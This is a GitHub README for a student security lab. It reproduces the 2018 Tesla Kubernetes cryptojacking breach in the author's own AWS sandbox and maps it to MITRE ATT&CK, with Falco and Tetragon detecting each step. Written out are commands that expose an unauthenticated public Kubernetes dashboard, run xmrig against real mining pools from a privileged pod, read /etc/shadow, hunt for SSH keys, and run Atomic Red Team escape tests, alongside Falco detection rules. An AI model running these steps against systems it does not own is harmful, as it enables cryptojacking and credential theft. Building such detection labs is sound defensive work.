Skip to content

As part of this task I was required to map the Tesla Data Breach to the MITRE ATT&CK framework. From here I select any 2 specific ‘techniques’ from the incident and replicate both on a ‘proof of concept’ basis. This will allow me to display my understanding by synthesizing the selected technical techniques. I'll document 2 techniques in this repo.

Notifications You must be signed in to change notification settings

nigeldouglas-itcarlow/2018-Tesla-Data-Breach

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

2018 Tesla Data Breach

As part of this task I was required to map the Tesla Data Breach to the MITRE ATT&CK framework. From here I select any 2 specific ‘techniques’ from the incident and replicate both on a ‘proof of concept’ basis. This will allow me to display my understanding by synthesizing the selected technical techniques.

Architectural Diagram

outline Link to Google Diagram

Falco Detections aligned with MITRE ATT&CK Framework

Falco Detection Rule Description Event Source MITRE ATT&CK Tactic
Terminal Shell in Container A shell was used as the entrypoint/exec point into a container with an attached terminal. Host System Calls Execution
Detect crypto miners using the Stratum protocol Miners typically specify the mining pool to connect to with a URI that begins with stratum+tcp Host System Calls Execution, Command & Control
Detect outbound connections to common miner pool ports Miners typically connect to mining pools on common ports. Host System Calls Execution, Command & Control
Mining Binary Detected Malicious script or binary detected within pod or host. This rule will be triggered by the execve syscall Host System Calls Persistence
List AWS S3 Buckets Detect listing of all S3 buckets. In the case of Tesla, those buckets contained sensitive data such as passwords, tokens and telemetry data. AWS Cloudtrail Audit Logs Credential Access
Contact EC2 Instance Metadata Service From Container Detect listing of all S3 buckets. In the case of Tesla, those buckets contained sensitive data such as passwords, tokens and telemetry data. Host System Calls Lateral Movement

Setting-up the Sanbox

Had to setup an AWS-CLI Profile in order to interact with AWS services via my local workstation

aws configure --profile nigel-aws-profile
export AWS_PROFILE=nigel-aws-profile                                            
aws sts get-caller-identity --profile nigel-aws-profile
aws eks update-kubeconfig --region eu-west-1 --name tesla-cluster

Screenshot 2023-10-20 at 17 04 05

Once I had AWS-CLI installed, I created a 1 node, AWS EKS cluster using EKSCTL CLI tool.
Notice how I use the date command purely to confirm when those actions were enforced.

date
eksctl create cluster tesla-cluster --node-type t3.xlarge --nodes=1 --nodes-min=0 --nodes-max=3 --max-pods-per-node 58

Screenshot 2023-10-20 at 17 08 09

Once the cluster is successfully spun-up, I can scale it down to zero nodes to bring my compute costs in the cloud down to $0 until I'm ready to do actual work.

date
eksctl get cluster
eksctl get nodegroup --cluster tesla-cluster
eksctl scale nodegroup --cluster tesla-cluster --name ng-64004793 --nodes 0
Screenshot 2023-10-29 at 12 02 04

Exposing an insecure Kubernetes Dashboard

Kubernetes Dashboard is a general purpose, web-based UI for Kubernetes clusters.
It allows users to manage applications running in the cluster and troubleshoot them, as well as manage the cluster itself.

When Kubernetes dashboard is installed using the recommended settings, both authentication and HTTPS are enabled. Sometimes, organizations like Tesla choose to disable authentication or HTTPS.

For example, if Kubernetes dashboard is served behind a proxy, then it's unnecessary to enable authentication when the proxy has its own authentication enabled.

Kubernetes dashboard uses auto-generated certificates for HTTPS, which may cause problems for HTTP client to access.
The below YAML manifest is pre-packaged to provide an insecure dashboard with disable authentication and disabled HTTP/s.

kubectl apply -f https://vividcode.io/content/insecure-kubernetes-dashboard.yml

Still experiencing issues exposing the dashboard via port forwarding:

kubectl port-forward svc/kubernetes-dashboard -n kubernetes-dashboard 8443 --insecure-skip-tls-verify

The above manifest is a modified version of the deployment of Kubernetes dashboard which has removed the argument --auto-generate-certificates and has added some extra arguments:

--enable-skip-login
--disable-settings-authorizer
--enable-insecure-login
--insecure-bind-address=0.0.0.0

Screenshot 2023-10-21 at 12 41 45

After this change, Kubernetes dashboard server now starts on port 9090 for HTTP. It has also modified the livenessProbe to use HTTP as the scheme and 9090 as the port.

Accessing the Kubernetes Dashboard

This proxy command starts a proxy to the Kubernetes API server, and the dashboard should be accessible at
http://localhost:8001/api/v1/namespaces/kubernetes-dashboard/services/https:kubernetes-dashboard:/proxy/.

Screenshot 2023-10-21 at 12 49 34

However, I received the below error at proxy address:
"message": "no endpoints available for service \"https:kubernetes-dashboard:\""

Screenshot 2023-10-21 at 12 48 29

Troubleshooting the Dashboard Issues

Port 9090 is added as the containerPort. Similarly, the Kubernetes Service abstraction for the dashboard opens port 80 and uses 9090 as the target port. Accessing the dashboard at http://localhost:8001/ shows all associated paths, and its quite easy to obfuscate credentials from these paths:

Screenshot 2023-10-21 at 12 58 57

We can even see the underlying EC2 instance associated with the Kubernetes cluster. The EU-West-1 denotes the AWS Region (Ireland) I've installed the EC2 instance, and the IP address of the VM is also present in the name:

Screenshot 2023-10-21 at 13 02 09

The IP address in the previous OIDC screenshot does not match the private IP of my EC2 instance on AWS
I will come back to this later to understand how that OIDC address is used for single sign-on:

Screenshot 2023-10-21 at 13 07 53

Either way, I modified the original deployment script to make sure the Kubernetes Deployment uses a LoadBalancer service.
This way, AWS automatically assigns the public IP address for the dashboard service. Allowing it to be accessed publically:

kubectl apply -f https://raw.githubusercontent.com/nigeldouglas-itcarlow/2018-Tesla-Data-Breach/main/public-dashboard.yaml
Screenshot 2023-10-21 at 13 23 54

Proof that the L7 LB service was created in AWS automatically
However, there seems to be some health issues preventing me from accessing the dashboard.

Screenshot 2023-10-21 at 13 36 52

After you have done this, when Kubernetes dashboard is opened, you can click Skip in the login page to skip authentication and go to the dashboard directly.

kubernetes_dashboard_skip

Supporting documentation for Kubernetes Dashboard without Authentication

Installing Falco as our SOC solution

Installed Falco via Helm using the --set tty=true feature flag to ensure events are handled in real-time.
By default, only the stable rules are loaded by Falco, you can install the sandbox or incubating rules by referencing them in the Helm chart:
https://falco.org/docs/reference/rules/default-rules/

Remove the existing Falco installation with stable rules:

helm uninstall falco -n falco

Install Falco again with the modified falco-sandbox_rules.yaml referenced from my own Github repository: https://github.com/nigeldouglas-itcarlow/2018-Tesla-Data-Breach/blob/main/rules/falco-sandbox_rules.yaml


I'm enabling the ```incubation``` and ```sandbox``` rules for the purpose of this assignment:
helm install falco -f mitre_rules.yaml falcosecurity/falco --namespace falco \
  --create-namespace \
  --set tty=true \
  --set auditLog.enabled=true \
  --set falcosidekick.enabled=true \
  --set falcosidekick.webui.enabled=true \
  --set collectors.kubernetes.enabled=true \
  --set falcosidekick.webui.redis.storageEnabled=false \
  --set "falcoctl.config.artifact.install.refs={falco-incubating-rules:2,falco-sandbox-rules:2}" \
  --set "falcoctl.config.artifact.follow.refs={falco-incubating-rules:2,falco-sandbox-rules:2}" \
  --set "falco.rules_file={/etc/falco/falco-incubating_rules.yaml,/etc/falco/falco-sandbox_rules.yaml}"
kubectl get pods -n falco -o wide
Screenshot 2023-11-03 at 16 47 25
  • Where the option falcoctl.config.artifact.install.refs governs which rules are downloaded at startup
  • falcoctl.config.artifact.follow.refs identifies which rules are automatically updated and
  • falco.rules_file indicates which rules are loaded by the engine.

Alternatively, I can just edit the ConfigMap manually (and this might be easier in the end):

kubectl edit cm falco-rules -n falco

I can inject Custom Rules via the working-rules.yaml manifest: Screenshot 2023-10-29 at 11 42 58

I successfully deployed Falco and the associated dashboard
As seen in the below screenshot, it may go through some crash status changes before running correctly (expected due to lack of priority set):

Screenshot 2023-10-27 at 11 43 33

Finally, Port-Foward the Falco Sidekick from Macbook

kubectl port-forward svc/falco-falcosidekick-ui -n falco 2802 --insecure-skip-tls-verify

Forwarding from 127.0.0.1:2802 -> 2802 Forwarding from [::1]:2802 -> 2802 Handling connection for 2802

Screenshot 2023-10-27 at 11 56 17

Deploying a Test App and Checking Logs

Create an insecure containerized workload with privileged=true to give unrestricted permissions for the miner:

kubectl apply -f https://raw.githubusercontent.com/nigeldouglas-itcarlow/2018-Tesla-Data-Breach/main/tesla-app.yaml

Shell into the newly, over-privileged workload:

kubectl exec -it tesla-app -- bash
Screenshot 2023-10-27 at 12 02 09

To test the IDS/SOC tool, I peform one insecure behaviour in tab1 while also check for the Falco log event in tab2:

kubectl logs -f --tail=0 -n falco -c falco -l app.kubernetes.io/name=falco | grep 'tesla-app'
Screenshot 2023-10-22 at 13 54 45

If you look at the above screenshot, we created a new workload called tesla-app, I've terminal shelled into the workload, and I've the real-time live tail of security incidents showing in terminal 2 window - providing the IDS system works.

Supporting documentation for Falco event collect from Kubernetes and Cloud

Enabling Kubernetes Audit Logs in Falco

To enable Kubernetes audit logs, you need to change the arguments to the kube-apiserver process to add --audit-policy-file and --audit-webhook-config-file arguments and provide files that implement an audit policy/webhook configuration.

Below is a step-by-step guide will show you how to configure kubernetes audit logs on minikube and deploy Falco.
Managed Kubernetes providers, like AWS EKS, usually provide a mechanism to configure the audit system.
https://falco.org/docs/install-operate/third-party/learning/

Running a Cryptominer on an insecure workload

kubectl apply -f https://raw.githubusercontent.com/nigeldouglas-itcarlow/2018-Tesla-Data-Breach/main/tesla-app.yaml

The adversaries would have terminal shelled into the above workload in order to install the cryptominer.

kubectl exec -it tesla-app -- bash

Download the xmrig mining package from the official Github project:

curl -OL https://github.com/xmrig/xmrig/releases/download/v6.16.4/xmrig-6.16.4-linux-static-x64.tar.gz

Unzipping the mining binary package

tar -xvf xmrig-6.16.4-linux-static-x64.tar.gz

Changing directory to the newly-downloaded miner folder

cd xmrig-6.16.4

Elevating permissions

chmod u+s xmrig
find / -perm /6000 -type f

Tested - and works!

./xmrig --donate-level 8 -o xmr-us-east1.nanopool.org:14433 -u 422skia35WvF9mVq9Z9oCMRtoEunYQ5kHPvRqpH1rGCv1BzD5dUY4cD8wiCMp4KQEYLAN1BuawbUEJE99SNrTv9N9gf2TWC --tls --coin monero
Screenshot 2023-10-27 at 12 05 51

On the right side pane, we can see that all rules are automatically labelled with relevant MITRE ATT&CK context:

Screenshot 2023-10-27 at 12 06 03

After enabling the mining ports and pools rule within my mitre_rules.yaml file, I can see the new domain detection for mining pool:

Screenshot 2023-11-17 at 11 50 08

Testing my own MetaMask wallet using the stratum protocol outlined by the Trend Micro researchers:

./xmrig -o stratum+tcp://xmr.pool.minergate.com:45700 -u lies@lies.lies -p x -t 2
Screenshot 2023-10-31 at 19 53 07

Some rules are specifically disabled within the sandbox manifest file, so we need to enable these separately

Screenshot 2023-10-31 at 20 03 19

Maturity rules are coming through, but I need to make some changes either to the ConfigMap or within the custom rules config file:

Screenshot 2023-11-01 at 11 28 04

Custom Rules - Command & Control

Make sure the xmrig process is no longer running

top

If so, find the Process ID of the xmrig service:

pidof xmrig

You can now either kill the process by Process Name or Process ID

killall -9 xmrig

Nanonminer Test Scenario

wget https://github.com/nanopool/nanominer/releases/download/v1.4.0/nanominer-linux-1.4.0.tar.gz
tar -xvzf ./nanominer-linux-1.4.0.tar.gz
cd nanominer-linux-1.4.0/ 
nano config.ini
./nanominer -d

Credential Access

Finding credentials while we are in the container:

cat /etc/shadow > /dev/null
find /root -name "id_rsa"

Obfuscating Activity

This is where an attacker would use a Base64 script to evade traditional file-based detection systems
Shell into the newly-deployed atomic-red workload:

kubectl exec -it -n atomic-red deploy/atomicred -- bash

Confirm the atomic red scenario was detected (in a second terminal window):

kubectl logs -f --tail=0 -n falco -c falco -l app.kubernetes.io/name=falco | grep 'Bulk data has been removed from disk'

Detect File Deletion on Host (T1070.004)

Adversaries may delete files left behind by the actions of their intrusion activity.
Start a Powershell session with pwsh:

pwsh

Atomic Red Tests are all performed via Powershell
So it might look a bit weird that I shell into a Linux container in order to perform Pwsh actions.

Screenshot 2023-10-29 at 11 55 01

Load the Atomic Red Team module:

Import-Module "~/AtomicRedTeam/invoke-atomicredteam/Invoke-AtomicRedTeam.psd1" -Force

Check the details of the TTPs:

Invoke-AtomicTest T1070.004 -ShowDetails

Check the prerequisites to ensure the test conditions are right:

Invoke-AtomicTest T1070.004 -GetPreReqs

We will now execute the test.
This test will attempt to delete individual files, or individual directories.
This triggers the Warning bulk data removed from disk rule by default.

Invoke-AtomicTest T1070.004

I successfully detected file deletion in the Kubernetes environment:

Screenshot 2023-10-29 at 11 58 42

Escape to Host (T1611)

Adversaries may break out of a container to gain access to the underlying host.
This can allow an adversary access to other containerised resources from the host-level.

kubectl logs -f --tail=0 -n falco -c falco -l app.kubernetes.io/name=falco | grep Network tool launched in container
Invoke-AtomicTest T1611

Boot or Logon Initialisation Scripts (T1037.004)

Adversaries can establish persistence by modifying RC scripts which are executed during system startup

kubectl logs -f --tail=0 -n falco -c falco -l app.kubernetes.io/name=falco | grep Potentially malicious Python script
Invoke-AtomicTest T1037.004

The new detection totally worked. Hurrah!! Screenshot 2023-10-30 at 18 27 15

When you’re ready to move on to the next test or wrap things up, you’ll want to -CleanUp the test to avoid potentially having problems running other tests.

Invoke-AtomicTest T1037.004 -CleanUp

Launch a suspicious network tool in a container

Shell into the same container we used earlier

kubectl exec -it tesla-app -- bash

Installing a suspicious networking tool like telnet

yum install telnet telnet-server -y

If this fails, just apply a few modifications to the registry management:

cd /etc/yum.repos.d/
sed -i 's/mirrorlist/#mirrorlist/g' /etc/yum.repos.d/CentOS-*
sed -i 's|#baseurl=http://mirror.centos.org|baseurl=http://vault.centos.org|g' /etc/yum.repos.d/CentOS-*

Update the yum registry manager:

yum update -y

Now, try to install telnet and telnet server from the registry manager:

yum install telnet telnet-server -y

Just to generate the detection, run telnet:

telnet
Screenshot 2023-11-14 at 21 16 33 Screenshot 2023-11-14 at 21 16 56 Screenshot 2023-11-14 at 21 15 59

Let's also test tcpdump to prove the macro is working:

yum install tcpdump -y
tcpdump -D
tcpdump --version
tcpdump -nnSX port 443

Exfiltrating Artifacts via the Kubernetes Control Plane

Copy Files From Pod to Local System.
We have a nginx web server running inside a container.
Let’s copy the index.html file (which nginx serves by default) inside the /usr/share/nginx/html directory to our local system. Run the following command:

kubectl cp tesla-app:xmrig-6.16.4-linux-static-x64.tar.gz ~/desktop/xmrig-6.16.4-linux-static-x64.tar.gz
Screenshot 2023-11-01 at 11 33 23

T1552.001 - Unsecured Credentials: Credentials In Files

We can use Atomic Red team to Find AWS credentials in order to move laterally to the cloud https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md#atomic-test-1---find-aws-credentials

Invoke-AtomicTest T1552.001 -ShowDetails
Screenshot 2023-11-13 at 21 27 36

Cleanup Helm Deployments

helm uninstall falco -n falco
Screenshot 2023-10-27 at 14 43 45

AWS Profile Stuff

aws configure --profile nigel-aws-profile
export AWS_PROFILE=nigel-aws-profile                                            
aws sts get-caller-identity --profile nigel-aws-profile
aws eks update-kubeconfig --region eu-west-1 --name tesla-cluster
Screenshot 2023-10-22 at 19 53 37

Confirming the detection rules are present in the current, up-to-date rules feed:
https://thomas.labarussias.fr/falco-rules-explorer/?source=okta

Exposing Falco Sidekick from my EC2 instance:

sudo ssh -i "falco-okta.pem" -L 2802:localhost:2802 ubuntu@ec2-**-***-**-***.eu-west-1.compute.amazonaws.com

Accessing the Sidekick UI via Localhost

http://localhost:2802/events/?since=15min&filter=mitre

Running Atomic Red Team in Kubernetes

Create the network namespace for the atomic red workload

kubectl create ns atomic-red

Create the deployment using an external image issif/atomic-red:latest

kubectl apply -f - <<EOF
apiVersion: apps/v1
kind: Deployment
metadata:
  name: atomicred
  namespace: atomic-red
  labels:
    app: atomicred
spec:
  replicas: 1
  selector:
    matchLabels:
      app: atomicred
  template:
    metadata:
      labels:
        app: atomicred
    spec:
      containers:
      - name: atomicred
        image: issif/atomic-red:latest
        imagePullPolicy: "IfNotPresent"
        command: ["sleep", "3560d"]
        securityContext:
          privileged: true
      nodeSelector:
        kubernetes.io/os: linux
EOF

Note: This creates a pod called atomicred in the atomic-red network namespace:

kubectl get pods -n atomic-red -w | grep atomicred

I successfully deployed the atomic-red container to my environment: Screenshot 2023-10-29 at 11 50 08

Use Vim to create our custom rules:

vi mitre_rules.yaml
customRules:
  mitre_rules.yaml: |-
    - rule: Base64-encoded Python Script Execution
      desc: >
        This rule detects base64-encoded Python scripts on command line arguments.
        Base64 can be used to encode binary data for transfer to ASCII-only command
        lines. Attackers can leverage this technique in various exploits to load
        shellcode and evade detection.
      condition: >
        spawned_process and (
          ((proc.cmdline contains "python -c" or proc.cmdline contains "python3 -c" or proc.cmdline contains "python2 -c") and
          (proc.cmdline contains "echo" or proc.cmdline icontains "base64"))
          or
          ((proc.cmdline contains "import" and proc.cmdline contains "base64" and proc.cmdline contains "decode"))
        )
      output: >
        Potentially malicious Python script encoded on command line
        (proc.cmdline=%proc.cmdline user.name=%user.name proc.name=%proc.name
        proc.pname=%proc.pname evt.type=%evt.type gparent=%proc.aname[2]
        ggparent=%proc.aname[3] gggparent=%proc.aname[4] evt.res=%evt.res
        proc.pid=%proc.pid proc.cwd=%proc.cwd proc.ppid=%proc.ppid
        proc.pcmdline=%proc.pcmdline proc.sid=%proc.sid proc.exepath=%proc.exepath
        user.uid=%user.uid user.loginuid=%user.loginuid
        user.loginname=%user.loginname group.gid=%group.gid group.name=%group.name
        image=%container.image.repository:%container.image.tag
        container.id=%container.id container.name=%container.name file=%fd.name)
      priority: warning
      tags:
        - ATOMIC_RED_T1037.004
        - MITRE_TA0005_defense_evasion
        - MITRE_T1027_obfuscated_files_and_information
      source: syscall
      append: false
      exceptions:
        - name: proc_cmdlines
          comps:
            - startswith
          fields:
            - proc.cmdline

I'm lazy, so I uninstall and reinstall charts rathert than upgrading:

helm uninstall falco -n falco

Alternative way of testing the new mitre_rules.yaml file:

helm install falco -f mitre_rules.yaml falcosecurity/falco --namespace falco \
  --create-namespace \
  --set tty=true \
  --set auditLog.enabled=true \
  --set falcosidekick.enabled=true \
  --set falcosidekick.webui.enabled=true \
  --set collectors.kubernetes.enabled=true \
  --set falcosidekick.webui.redis.storageEnabled=false

Let's delete the Falco pod to ensure the changes have been enforced.

kubectl delete pod -l app.kubernetes.io/name=falco -n falco

Note: A new pod after several seconds. Please be patient.

kubectl get pods -n falco -w

Ongoing Issues

Issues with the environment (Making Number of VPCs was reached) - disregard: Screenshot 2023-10-25 at 20 40 42

Deploying the Kubernetes dashboard via Helm

Add kubernetes-dashboard repository

helm repo add kubernetes-dashboard https://kubernetes.github.io/dashboard/

Deploy a Helm Release named kubernetes-dashboard using the kubernetes-dashboard chart

helm upgrade --install kubernetes-dashboard kubernetes-dashboard/kubernetes-dashboard --create-namespace --namespace kubernetes-dashboard
Screenshot 2023-11-03 at 11 39 14

Uninstall the Kubernetes Dashboard

helm uninstall kubernetes-dashboard -n kubernetes-dashboard
Screenshot 2023-11-18 at 23 47 28

Copying the kubeconfig file from its rightful location to my desktop:

cp ~/.kube/config ~/Desktop/

Install Tetragon

helm repo add cilium https://helm.cilium.io
helm repo update
helm install tetragon cilium/tetragon -n kube-system
kubectl rollout status -n kube-system ds/tetragon -w

Network traffic analysis using Tetragon

Create a TracingPolicy in Tetragon

kubectl apply -f https://raw.githubusercontent.com/cilium/tetragon/main/examples/tracingpolicy/tcp-connect.yaml

Tracing via Tetragon

Open an activity tail for Tetragon (Terminal 2):

kubectl logs -n kube-system -l app.kubernetes.io/name=tetragon -c export-stdout -f | tetra getevents -o compact --namespace default --pod tesla-app

Open an event output for Falco (Terminal 3):

kubectl logs --follow -n falco -l app.kubernetes.io/instance=falco | grep k8s.pod=tesla-app
Screenshot 2023-11-18 at 20 31 20

Kill the Miner Processes using Tetragon

Now we apply a Tetragon TracingPolicy that will perform sigkill action when the script is run:

https://raw.githubusercontent.com/nigeldouglas-itcarlow/2018-Tesla-Data-Breach/main/sigkill-miner.yaml
Screenshot 2023-11-18 at 20 40 11

Custom Test Scenarios:

Base64 encoding, mining binaries and mining pools. They all work!! :)

helm install falco falcosecurity/falco \
  -n falco \
  --version 3.3.0 \
  --set falcosidekick.enabled=true \
  --set falcosidekick.webui.enabled=true \
  --set collectors.kubernetes.enabled=true \
  --set falcosidekick.webui.redis.storageEnabled=false \
  -f custom-rules.yaml

Deploy Kubernetes Dashboard:

kubectl apply -f https://raw.githubusercontent.com/nigeldouglas-itcarlow/2018-Tesla-Data-Breach/main/public-dashboard.yaml
Screenshot 2023-11-18 at 23 59 08

About

As part of this task I was required to map the Tesla Data Breach to the MITRE ATT&CK framework. From here I select any 2 specific ‘techniques’ from the incident and replicate both on a ‘proof of concept’ basis. This will allow me to display my understanding by synthesizing the selected technical techniques. I'll document 2 techniques in this repo.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published